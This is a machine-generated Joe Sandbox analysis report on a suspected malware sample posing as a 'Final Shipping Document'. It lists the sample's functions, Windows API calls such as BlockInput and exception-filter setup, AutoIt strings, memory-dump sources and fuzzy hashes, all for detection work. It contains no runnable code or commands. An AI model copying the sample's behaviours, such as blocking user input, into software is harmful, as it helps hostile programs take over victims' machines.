                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                            • Instruction ID: 4a9c044e6eef2c703a70df0bf3c0440b3cdd1067a22336fdf59d58923134fe82
                                                            • Opcode Fuzzy Hash: e0b042af28943c07063699c8face7394b0d322b940f9933f7b9669219b598f06
                                                            • Instruction Fuzzy Hash: 1A126E759002299BCB24CF58C881BFEB7F5FF48710F14819AE949EB251DBB09A85CF90
                                                            Function 00C1EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00C1EABD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                            • Instruction ID: 1dff74346acff82de6c61ebf0c9c9771448e0f2e6aa2bf0bdd5e56e93d1dc639
                                                            • Opcode Fuzzy Hash: fc4e50c2d0e0806b3ce235c9b49372ef77cea628ba001766913906425c4dee6f
                                                            • Instruction Fuzzy Hash: 48E04F322142049FC710EF6AD855E9AFBE9AF99760F00845AFC4AD7351DB70E8809B91
                                                            Function 00BC09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00BC03EE), ref: 00BC09DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                            • Instruction ID: a245283cef81f1873c8332e72d379cc53c28ce91ee94d426ff211a26d772293b
                                                            • Opcode Fuzzy Hash: 0f9c549670f404c64c2ba81dfa3026e46316505d4b0dedcc0fd1698e24bab1a1
                                                            • Instruction Fuzzy Hash:
                                                            Function 00BC781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0
                                                            • API String ID: 0-4108050209
                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                            • Instruction ID: 909d1e8ae6773ba9af078ce6fce3428f448a365029cb7d423f1363590ce52568
                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                            • Instruction Fuzzy Hash: 0D516A716CC6056BDF38862A889DFBE23D5DB12340F1805DDEA86D7282CE61DE01DF66
                                                            Function 00BD6DD9 Relevance: .6, Instructions: 637COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c962464e4a37df8790d947ccb5fdda6489dcd1f7f3d218ccfd73a76da3220204
                                                            • Instruction ID: a6a3691b097ec5e56e52cdef9cf7b512d3909555b1afdf80ead77f863a4a93e7
                                                            • Opcode Fuzzy Hash: c962464e4a37df8790d947ccb5fdda6489dcd1f7f3d218ccfd73a76da3220204
                                                            • Instruction Fuzzy Hash: F7322226D69F014DD7239634D822339A689AFB73C5F55C737F81AB5AAAFF29C4834100
                                                            Function 00BBCC39 Relevance: .6, Instructions: 635COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 115b9d5d900c3b8ee04efaa5ee0c5f3ca878b33566a22ae450cb8fab455f27dc
                                                            • Instruction ID: d425e2f241248869be8054ef29ce8ef6f605f328984b96e616e6dd1c4c7f6775
                                                            • Opcode Fuzzy Hash: 115b9d5d900c3b8ee04efaa5ee0c5f3ca878b33566a22ae450cb8fab455f27dc
                                                            • Instruction Fuzzy Hash: 5E32F431A0414D8BCF28CE29C6D46BD7FE1EB45300F2885EAD65ACB296D3709DC9DB81
                                                            Function 00BA7920 Relevance: .6, Instructions: 563COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d31d9e9bdcaa3c4c6721a2a3a7fef29774100c35114f76c3846100c48a7434de
                                                            • Instruction ID: f78286f51ee86ed7d04c5d97bbd1437871879975678e53f1279e0c829c8f6796
                                                            • Opcode Fuzzy Hash: d31d9e9bdcaa3c4c6721a2a3a7fef29774100c35114f76c3846100c48a7434de
                                                            • Instruction Fuzzy Hash: 5C22A1B0A0860AEFDF14CF65C881AAEB3F5FF45304F1445A9E816A7291EB35AD15CB60
                                                            Function 00BA91C0 Relevance: .5, Instructions: 475COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: da85a897a64fe51f7f712e9002ee4585dedb01b3a7acaebe6cae26f522935190
                                                            • Instruction ID: fe24a11c5998c9efc6efd0375eff6b58c534cb1ce195055ede8ccfcecc14261b
                                                            • Opcode Fuzzy Hash: da85a897a64fe51f7f712e9002ee4585dedb01b3a7acaebe6cae26f522935190
                                                            • Instruction Fuzzy Hash: 9D02A5B0E00246EBDB14DF65D881BAEB7F5FF44300F1081A9E8169B391EB71EA11DB95
                                                            Function 00BC1C77 Relevance: .3, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                            • Instruction ID: ef46410abd72ce9c216685dc1ee3486065f94e6f2dad9b505d46e639f6cce264
                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                            • Instruction Fuzzy Hash: 119189722090A349D729463D8574A3EFFE1DA533A13190FEDE4F3DA1C6EE20C565D620
                                                            Function 00BC19B0 Relevance: .2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                            • Instruction ID: eca8ef6f3bec72f41531e77c5693283af363a126b6130355e6f9da5183a91734
                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                            • Instruction Fuzzy Hash: 73914A722090A34ADB2D467D8574A3DFFE19A533A13190BDDE4F2DA1C2FD24C965D620
                                                            Function 00BC7A4A Relevance: .2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcacdbfb90637a371881b614cd7cead2a12a14af116f693b82f5d278324c3a9a
                                                            • Instruction ID: 3f2fdc04e442e69c2248f9a1728657ac3c04d39dd2dc3d9f9690401b0d56ba66
                                                            • Opcode Fuzzy Hash: dcacdbfb90637a371881b614cd7cead2a12a14af116f693b82f5d278324c3a9a
                                                            • Instruction Fuzzy Hash: 596136717C8709A6DB349A2889A5FBF23D4DF41710F1409DEF882DB281DE519E428F55
                                                            Function 00BC7CA7 Relevance: .2, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d59e8ed12c3cbf7e995441ff0062cdd822e6bb5b32d522b63f5a22d796f4ef69
                                                            • Instruction ID: 65d68466db1511d181e75fd3b8e364e0a86224dbf910fb23c87b36f59bb4e46c
                                                            • Opcode Fuzzy Hash: d59e8ed12c3cbf7e995441ff0062cdd822e6bb5b32d522b63f5a22d796f4ef69
                                                            • Instruction Fuzzy Hash: 7C616BB26C870A67DA389A284896FBF23D8DF41740F1009FDF843DB281DE129D42CE55
                                                            Function 00BC1706 Relevance: .2, Instructions: 232COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                            • Instruction ID: 2378da0972e3d0603f03b5f5a78a99823320c5526706a6d45649cbf201f9cb71
                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                            • Instruction Fuzzy Hash: 3781777260D0A349DB2D463D857493EFFE19A933A131A0BDED4F2DA1C3EE24C955D620
                                                            Function 00C12046 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                            • Instruction ID: 2b93dd3de63335e88f9165079c2def7a7a363cfe1f1719a4d679c5a56ed5d333
                                                            • Opcode Fuzzy Hash: 44efcf01abca864eb748ed96d3b04504d2efe77390c1dc73f4812cc06671f852
                                                            • Instruction Fuzzy Hash: 2321A5326206118BDB28CF79C8227BE73E5A754310F25862EE4A7C37D1DE39A944DB80
                                                            Function 00C22ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00C22B30
                                                            • DeleteObject.GDI32(00000000), ref: 00C22B43
                                                            • DestroyWindow.USER32 ref: 00C22B52
                                                            • GetDesktopWindow.USER32 ref: 00C22B6D
                                                            • GetWindowRect.USER32(00000000), ref: 00C22B74
                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C22CA3
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C22CB1
                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22CF8
                                                            • GetClientRect.USER32(00000000,?), ref: 00C22D04
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C22D40
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D62
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D75
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D80
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D89
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22D98
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DA1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DA8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00C22DB3
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22DC5
                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C3FC38,00000000), ref: 00C22DDB
                                                            • GlobalFree.KERNEL32(00000000), ref: 00C22DEB
                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C22E11
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C22E30
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C22E52
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C2303F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                            • Instruction ID: 81eeff2b0e6bb7eead765bc12150f108f514772a89e218da3a95784a1b568cac
                                                            • Opcode Fuzzy Hash: 062f213d4a729d855a8fa1cd44edefde9c7fb0073f2f496221d3e5817de8bb53
                                                            • Instruction Fuzzy Hash: C5026971A10219AFDB14DFA4DC89FAE7BB9EF49310F048158F915AB2A1CB74ED41CB60
                                                            Function 00C370D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 00C3712F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C37160
                                                            • GetSysColor.USER32(0000000F), ref: 00C3716C
                                                            • SetBkColor.GDI32(?,000000FF), ref: 00C37186
                                                            • SelectObject.GDI32(?,?), ref: 00C37195
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C371C0
                                                            • GetSysColor.USER32(00000010), ref: 00C371C8
                                                            • CreateSolidBrush.GDI32(00000000), ref: 00C371CF
                                                            • FrameRect.USER32(?,?,00000000), ref: 00C371DE
                                                            • DeleteObject.GDI32(00000000), ref: 00C371E5
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00C37230
                                                            • FillRect.USER32(?,?,?), ref: 00C37262
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C37284
                                                              • Part of subcall function 00C373E8: GetSysColor.USER32(00000012), ref: 00C37421
                                                              • Part of subcall function 00C373E8: SetTextColor.GDI32(?,?), ref: 00C37425
                                                              • Part of subcall function 00C373E8: GetSysColorBrush.USER32(0000000F), ref: 00C3743B
                                                              • Part of subcall function 00C373E8: GetSysColor.USER32(0000000F), ref: 00C37446
                                                              • Part of subcall function 00C373E8: GetSysColor.USER32(00000011), ref: 00C37463
                                                              • Part of subcall function 00C373E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C37471
                                                              • Part of subcall function 00C373E8: SelectObject.GDI32(?,00000000), ref: 00C37482
                                                              • Part of subcall function 00C373E8: SetBkColor.GDI32(?,00000000), ref: 00C3748B
                                                              • Part of subcall function 00C373E8: SelectObject.GDI32(?,?), ref: 00C37498
                                                              • Part of subcall function 00C373E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00C374B7
                                                              • Part of subcall function 00C373E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C374CE
                                                              • Part of subcall function 00C373E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C374DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 2561e724e4b4084abb885ff2413a022a9176241dcb2fcb53c6beb717ae635d48
                                                            • Instruction ID: 1158584cf5a885e73b2aa752f487cde26d01bc38c808ae382ef21e405ca5a008
                                                            • Opcode Fuzzy Hash: 2561e724e4b4084abb885ff2413a022a9176241dcb2fcb53c6beb717ae635d48
                                                            • Instruction Fuzzy Hash: A7A18EB2018301EFDB109F64DC88B6F7BA9FB49321F100B19F962A61E1D775E944DB91
                                                            Function 00BB8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?), ref: 00BB8E14
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BF6AC5
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BF6AFE
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BF6F43
                                                              • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB8BE8,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BB8FC5
                                                            • SendMessageW.USER32(?,00001053), ref: 00BF6F7F
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BF6F96
                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FAC
                                                            • ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF6FB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
